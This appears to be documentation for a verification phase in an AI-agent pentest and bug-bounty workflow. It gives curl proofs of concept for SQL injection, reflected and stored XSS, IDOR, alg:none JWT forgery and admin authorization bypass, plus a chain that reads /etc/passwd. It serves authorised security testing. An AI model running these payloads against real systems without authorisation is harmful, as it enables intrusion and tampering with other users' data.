
Phase 5: Verification & PoC Validation

Overview

Phase 5 ensures every reported vulnerability has a working, reproducible exploit and an evidence package strong enough to survive peer review, client delivery, and bug bounty triage. Findings without working exploits are rejected and not included in the final report.

Purpose: Eliminate false positives and confirm that every reported vulnerability is real and exploitable.

The Verification Principle

CRITICAL RULE: No working exploit = no report. No real evidence = no report.

Every finding created in Phase 4 must be verified:

1. Test the exact exploit steps on the live target
2. Confirm the vulnerability is real (not a false positive)
3. Ask the user for confirmation before final inclusion
4. If the exploit fails → reject the finding

For pentests, verification is not complete until the finding includes the full raw HTTP request and the full raw HTTP response, with complete headers and complete body, plus representative screenshots whenever the strongest proof is visual or browser-driven. For bug bounty findings, keep the PoC as fast as possible, preferably curl, and record a video of the working PoC.

This approach keeps the false-positive rate near zero and preserves credibility with the client.

Verification Flow

graph TB
    A["Phase 4 Complete<br/>N findings in findings/"] --> B["Categorize Findings<br/>Count by severity"]
    B --> C{"Findings < 6?"}
    C -->|Yes| D["Sequential Verify<br/>1 agent"]
    C -->|No| E["Parallel Verify<br/>3 batches, 3 agents"]
    D --> F["Build PoC<br/>curl command"]
    E --> F
    F --> G["Run Exploit<br/>Live target"]
    G --> H{Exploit Works?}
    H -->|Yes| I["Record Evidence<br/>Response, screenshot"]
    H -->|No| J["Reject Finding<br/>Log false positive"]
    I --> K["Cleanup<br/>Remove payloads"]
    K --> L["User Confirmation<br/>Include in report?"]
    J --> M["Phase 5 Complete<br/>Verified findings ready"]
    L --> M

    style A fill:#4a148c,color:#fff
    style M fill:#4a148c,color:#fff
    style I fill:#ab47bc,color:#fff
    style K fill:#ab47bc,color:#fff

Borderline Second Opinion

Verification now includes a compact Codex second-opinion path for borderline findings.

This path is used when:

  • evidence is real but not yet decisive
  • the exploit behaves inconsistently
  • Claude can reproduce some signal but not enough for a clean verdict
  • the likely issue is high-value enough that a bounded second opinion is justified

Decision Split

| Step | Engine | Responsibility |
|------|--------|----------------|
| Live exploit attempt | Claude | Run the PoC against the target |
| Borderline review | Codex finding_verifier | Evaluate the compact evidence bundle |
| Final verdict | Claude | Decide promote, retest, or reject |

Codex does not replace live verification. It challenges assumptions and suggests whether the current evidence supports:

  • promotion to verified finding
  • downgrade to weak signal
  • one more targeted retest
  • full rejection as likely false positive

Compact Advisory Input

The borderline review is intentionally small and structured. It includes:

  • target surface
  • current hypothesis
  • concise attempt summary
  • evidence bundle
  • constraints

This keeps Codex focused on the finding itself instead of the full engagement transcript.
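As a sketch, the five bullets above can be assembled into a small bundle file before handing it to the reviewer. The `advisory/` path, the filename, and the field values are assumptions for illustration:

```shell
# Assemble a compact advisory bundle (paths and field values are assumptions)
bundle_file="advisory/FINDING-007-bundle.md"
mkdir -p advisory

cat > "$bundle_file" <<'EOF'
## Borderline Review Input
- target surface: /api/v1/reports/export
- hypothesis: filename parameter allows path traversal
- attempt summary: 3 tries (two 500 errors, one partial read)
- evidence bundle: request/response pair attached separately
- constraints: no destructive payloads, two retests max
EOF
```

The bundle stays deliberately small, mirroring the compact-input rule above.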

Expected Outcome

The intended result is fewer false positives and fewer wasted Claude tokens on repeated self-checks of the same ambiguous case.

How Findings Are Verified

1. SQLi Verification

Safe verification technique: Use SLEEP() or BENCHMARK() to confirm time-based SQLi without extracting data

# Original vulnerable parameter (use --data-urlencode so the payload survives intact)
curl -G "https://api.example.com/api/v1/users" \
  --data-urlencode "sort=name' OR '1'='1"

# Verification: time-based
curl -G -w "@curl-format.txt" "https://api.example.com/api/v1/users" \
  --data-urlencode "sort=name' AND SLEEP(5) -- -"
# Expected: Response takes 5+ seconds

Acceptable evidence:

- ✅ Time delay in response (SLEEP confirms query execution)
- ✅ SELECT statement in error message (confirms SQL context)
- ✅ Different output with OR 1=1 (confirms injection)
- ❌ Just "error message" without confirming SQL injection
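The time-based check lends itself to a small helper so the delayed request is compared against a measured baseline rather than eyeballed. This is a sketch: `measure` runs against the live target, and the 80% jitter threshold is an assumption:

```shell
# measure: total response time in seconds for a URL (hits the live target)
measure() { curl -s -o /dev/null -w '%{time_total}' "$1"; }

# is_delayed: succeeds when the payload response is slower than the baseline
# by at least 80% of the injected SLEEP value (threshold is an assumption)
is_delayed() {  # args: baseline_seconds payload_seconds injected_delay
  awk -v base="$1" -v payload="$2" -v delay="$3" \
    'BEGIN { exit !(payload - base >= delay * 0.8) }'
}

# e.g. is_delayed "$(measure "$BASE_URL")" "$(measure "$SLEEP_URL")" 5 \
#   && echo "time-based SQLi confirmed"
```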

2. XSS Verification

Reflected XSS: Inject alert(document.domain) and verify JavaScript execution

# Test reflected XSS (save the response for inspection)
curl -s "https://api.example.com/search?q=<script>alert(document.domain)</script>" \
  -o response.html

# Verify the response reflects the payload unescaped
grep -q "alert(document.domain)" response.html && echo "reflected unescaped"

Stored XSS: POST payload → GET to verify persistence

# Step 1: Store payload
curl -X POST "https://api.example.com/comments" \
  -d "text=<img src=x onerror=alert(1)>"

# Step 2: Verify persistence (save the response, then check it)
curl -s "https://api.example.com/comments/123" -o response.html
grep -q "onerror=alert" response.html && echo "payload stored unescaped"

DOM XSS: Use Playwright MCP or browser extension to verify:

- Inspect DOM for payload
- Check console for errors
- Visual confirmation of JavaScript execution

3. IDOR Verification

Technique: Enumerate user IDs and verify access to another user's data

# Authenticated as User A (ID 1)
curl -H "Authorization: Bearer TOKEN_USER_A" \
  "https://api.example.com/api/v1/users/2/profile"

# If User A can read User B's profile (ID 2), it's IDOR

Evidence:

- ✅ Retrieved another user's PII (name, email, phone)
- ✅ Modified another user's data
- ✅ Deleted another user's resource
- ❌ Got 200 response (but endpoint doesn't return sensitive data)
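The enumeration step can be sketched as a loop that records the status code per ID; `probe` touches the live target, while `idor_candidates` is a pure filter over the collected results (both helper names are hypothetical):

```shell
# probe: request a URL with a bearer token, print only the HTTP status code
probe() { curl -s -o /dev/null -w '%{http_code}' -H "Authorization: Bearer $1" "$2"; }

# idor_candidates: given "id:status" pairs, print the IDs that returned 200
idor_candidates() {
  for pair in "$@"; do
    case "$pair" in *:200) printf '%s\n' "${pair%%:*}" ;; esac
  done
}

# e.g. idor_candidates "2:$(probe "$TOKEN_USER_A" "$BASE/api/v1/users/2/profile")"
```

A 200 here is only a candidate: the response body must still show another user's data, per the evidence rules above.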

4. Broken Authentication Verification

JWT Algorithm Confusion:

# Original token
ORIGINAL_TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

# Craft token with alg: "none"
NONE_TOKEN="eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.payload."

# Verify it's accepted
curl -H "Authorization: Bearer $NONE_TOKEN" \
  "https://api.example.com/api/v1/admin"

# If 200 response (not 401), authentication is broken
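The `alg: none` token can be crafted entirely locally before the single request to the target. This sketch uses `openssl` for base64url encoding; the claim set is an illustrative assumption:

```shell
# b64url: base64 encode, convert to the URL-safe alphabet, strip padding
b64url() { openssl base64 -A | tr '+/' '-_' | tr -d '='; }

header=$(printf '%s' '{"alg":"none","typ":"JWT"}' | b64url)
claims=$(printf '%s' '{"sub":"1","role":"admin"}' | b64url)  # claims are illustrative

# alg:none tokens keep the trailing dot but carry no signature
NONE_TOKEN="${header}.${claims}."
printf '%s\n' "$NONE_TOKEN"
```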

5. Authorization Bypass Verification

Test: Low-privilege user accessing high-privilege functions

# Authenticate as "User" role (lowest privilege)
curl -H "Authorization: Bearer USER_TOKEN" \
  "https://api.example.com/api/v1/admin/users/delete?id=999"

# If 200/204 (user deleted), authz is bypassed
# If 403 (forbidden), authz is enforced
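A tiny helper makes the pass/fail rule explicit: any 2xx on a privileged action taken with a low-privilege token is a violation (the helper name is hypothetical):

```shell
# authz_violated: succeeds when a privileged action returned any 2xx status
authz_violated() {
  case "$1" in 2??) return 0 ;; *) return 1 ;; esac
}

# e.g. status=$(curl -s -o /dev/null -w '%{http_code}' \
#        -H "Authorization: Bearer USER_TOKEN" \
#        "https://api.example.com/api/v1/admin/users/delete?id=999")
# authz_violated "$status" && echo "authorization bypass confirmed"
```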

Evidence Collection

For each verified finding, collect:

1. Full HTTP Request (Pentest Standard)

POST /api/v1/users HTTP/1.1
Host: api.example.com
Authorization: Bearer eyJhbG...
Content-Type: application/json

{"email":"test' OR '1'='1","role":"admin"}

2. Full HTTP Response (Pentest Standard)

HTTP/1.1 200 OK
Content-Type: application/json
X-Request-Id: 8f3a1b2c

{"users":[{"id":1,"email":"admin@example.com","role":"admin"},...]}

Store the complete response by default. Do not truncate headers or body unless you are performing minimal redaction of secrets or non-essential sensitive data.
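One way to capture the complete exchange in a single pass with curl; the `evidence/` layout and filenames are assumptions:

```shell
# evidence_path: build a per-finding evidence filename (layout is an assumption)
evidence_path() { printf 'evidence/%s-%s' "$1" "$2"; }

# save_evidence: store headers, full body, and an ASCII wire trace for one request
save_evidence() {  # args: finding_id url
  mkdir -p evidence
  curl -s \
    -D "$(evidence_path "$1" response-headers.txt)" \
    -o "$(evidence_path "$1" response-body.bin)" \
    --trace-ascii "$(evidence_path "$1" wire-trace.txt)" \
    "$2"
}

# e.g. save_evidence FINDING-001 "https://api.example.com/api/v1/users"
```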

3. Response Indicator (What proves the vuln)

Evidence: Response includes admin user in results when authenticated as non-admin user

4. Baseline (What the response should be)

Baseline: Response should only include users accessible to authenticated user's role

5. Representative Screenshot (When Relevant)

Capture a screenshot whenever the strongest proof is visual or browser-driven, for example:

- XSS or stored XSS dialog / rendered payload
- Authorization bypass visible in UI
- Sensitive data exposure rendered in page context
- Stored payload appearing for another role or another user

Screenshots must be representative, not decorative. A screenshot does not replace the raw HTTP evidence; it complements it.

6. Bug Bounty Only: Working-PoC Video

For bug bounty findings, record a video that shows:

- the real target
- the exact steps or the rapid curl PoC
- the exploit succeeding live
- the visible or observable impact

Bug bounty submissions without a working-PoC video are not submission-ready.

All collected in FINDING-NNN.md:

````markdown
## Evidence

**HTTP Request:**
```http
POST /api/v1/users HTTP/1.1
...
```

**HTTP Response:**
```http
HTTP/1.1 200 OK
...
```

**Response Indicator:** Response contains admin users when accessed as regular user

**Baseline:** Should return 403 Forbidden or empty user list for non-admin users
````

For pentests, this exact evidence package must propagate into HedgeDoc/Outline notes and the generated `.docx` report. The report is not allowed to downgrade full HTTP evidence into prose-only summaries.

Parallel Verification (6+ Findings)

When there are 6 or more findings, verify in parallel to save time:

```bash
# Batch 1 (agents 1-2): SQLi, XSS findings
# Batch 2 (agents 3-4): IDOR, Auth findings
# Batch 3 (agents 5-6): Logic, Infrastructure findings

# Run in parallel
claude -p < batch1.prompt > batch1-results.log &
claude -p < batch2.prompt > batch2-results.log &
claude -p < batch3.prompt > batch3-results.log &
wait
```

Batches consolidated after all complete.

Payload Cleanup (CRITICAL)

After evidence collection, ALL persistent payloads must be removed from the target:

Stored XSS Cleanup

# Payload was: <img src=x onerror=alert(1)>

curl -X PUT "https://api.example.com/comments/123" \
  -d "text=Cleaned up payload"

# Verify removal (grep -q sets exit status only; no match means the payload is gone)
if curl -s "https://api.example.com/comments/123" | grep -q "alert(1)"; then
  echo "payload still present"
else
  echo "payload removed"
fi

Applies to:

- Stored XSS in comments, profiles, messages
- Stored SSTI in templates
- Stored CRLF in headers
- Uploaded files (delete after screenshot)

Finding Record

{
  "finding_id": "FINDING-001",
  "cleanup_status": "cleaned",
  "cleanup_evidence": {
    "timestamp": "2026-03-13T14:35:00Z",
    "verified_removed": true
  }
}

User Confirmation Workflow

Before final inclusion in report, ask user for each finding:

Found: SQL Injection in /api/v1/users?sort=
Severity: HIGH
PoC: curl "https://api.example.com/api/v1/users?sort=name' AND SLEEP(5)"
Expected: Response delays 5+ seconds
Actual: Response delayed 5.2 seconds ✓

Include in report? (yes/no)

User can:

- ✅ yes: Include in report
- ❌ no: Exclude (e.g., "client wants to test this themselves")
- 🔍 re-verify: Run exploit again
- 📝 adjust: Change severity/description
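The prompt loop can be sketched as a small dispatcher over those four answers (the function name is hypothetical):

```shell
# confirm_action: map the user's answer to a canonical next step
confirm_action() {
  case "$1" in
    yes)       echo "include" ;;
    no)        echo "exclude" ;;
    re-verify) echo "re-verify" ;;
    adjust)    echo "adjust" ;;
    *)         echo "ask-again" ;;
  esac
}

# e.g. printf 'Include in report? (yes/no): ' && read -r answer
#      confirm_action "$answer"
```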

Verification Failure Handling

If exploit fails:

Finding: IDOR on /api/v1/users/{id}
Expected: Can access user 999 as user 1
Attempted: curl -H "Authorization: Bearer TOKEN_1" "https://api.example.com/api/v1/users/999"
Result: HTTP 403 Forbidden (Access Denied)

Conclusion: User correctly denied access → NOT VULNERABLE (False Positive)
Action: Remove from report

Common False Positives

| Scenario | Issue | Solution |
|----------|-------|----------|
| IDOR on /users/{id} returns 403 | Access control is working | False positive → remove |
| SQLi detected but returns same data | Query doesn't change results | Verify with time-based SQLi |
| XSS payload in response but HTML-escaped | Escaping prevents execution | False positive → remove |
| Auth bypass attempt rejected | Authorization properly enforced | False positive → remove |

Chain Detection

After verifying individual findings, /chain-findings correlates them into attack chains:

Example Chain:
├── Finding: SQLi on /api/v1/reports?sort=
├── Finding: LFI on /api/v1/reports/export?filename=
└── Chain: SQLi → extract admin email → LFI via filename injection → read /etc/passwd

Each chain gets a CHAIN-NNN.md file with execution steps.

Verification Statistics

After Phase 5:

- Verified findings: X (with working exploits)
- Rejected findings: Y (false positives)
- Cleanup status: All persistent payloads removed
- User confirmations: X/X (all approved)
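These counts can be derived mechanically rather than kept by hand, assuming each finding file carries a `Status:` line (the findings/ layout and line format are assumptions):

```shell
# count_status: count finding files in a directory whose Status line matches
count_status() {  # args: status dir
  grep -rl "^Status: $1" "$2" 2>/dev/null | wc -l | tr -d ' '
}

# e.g. echo "Verified: $(count_status verified findings/)"
#      echo "Rejected: $(count_status rejected findings/)"
```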

Next Phase

After Phase 5 completes with all findings verified and cleaned up, proceed to Phase 6: Report to generate the professional penetration test report.